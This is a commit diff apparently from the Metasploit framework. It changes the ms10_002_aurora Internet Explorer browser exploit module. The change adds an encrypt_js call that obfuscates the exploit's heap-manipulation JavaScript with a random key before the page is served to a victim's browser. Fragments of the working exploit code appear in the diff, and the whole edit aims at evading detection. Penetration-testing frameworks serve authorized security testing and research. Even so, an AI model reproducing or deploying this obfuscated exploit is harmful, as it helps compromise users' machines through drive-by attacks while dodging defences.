add encrypt_js call to aurora exploit

git-svn-id: file:///home/svn/framework3/trunk@9184 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/ms10_002_aurora.rb

@@ -74,6 +74,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DisclosureDate' => 'Jan 14 2009', # wepawet sample
 			'DefaultTarget'  => 0))
+
+		@javascript_encode_key = rand_text_alpha(rand(10) + 10)
 	end
 
 	def on_request_uri(cli, request)
@@ -106,11 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		var_start      = rand_text_alpha(rand(100) + 1)
 		rand_html      = rand_text_english(rand(400) + 500)
 
-		html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
-<html>
-<head>
-<script>
-var #{var_element} = "COMMENT";
+		js = %Q|var #{var_element} = "COMMENT";
 var #{var_el_array} = new Array();
 for (i = 0; i < 1300; i++)
 {
@@ -143,6 +141,14 @@ for (i = 0; i < #{var_el_array}.length; i++)
 }
 var t = #{var_event}.srcElement;
 }
+|
+		js_encoded = encrypt_js(js, @javascript_encode_key)
+
+		html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
+<html>
+<head>
+<script>
+#{js_encoded}
 </script>
 </head>
 <body>
@@ -158,4 +164,3 @@ var t = #{var_event}.srcElement;
 		handler(cli)
 	end
 end
-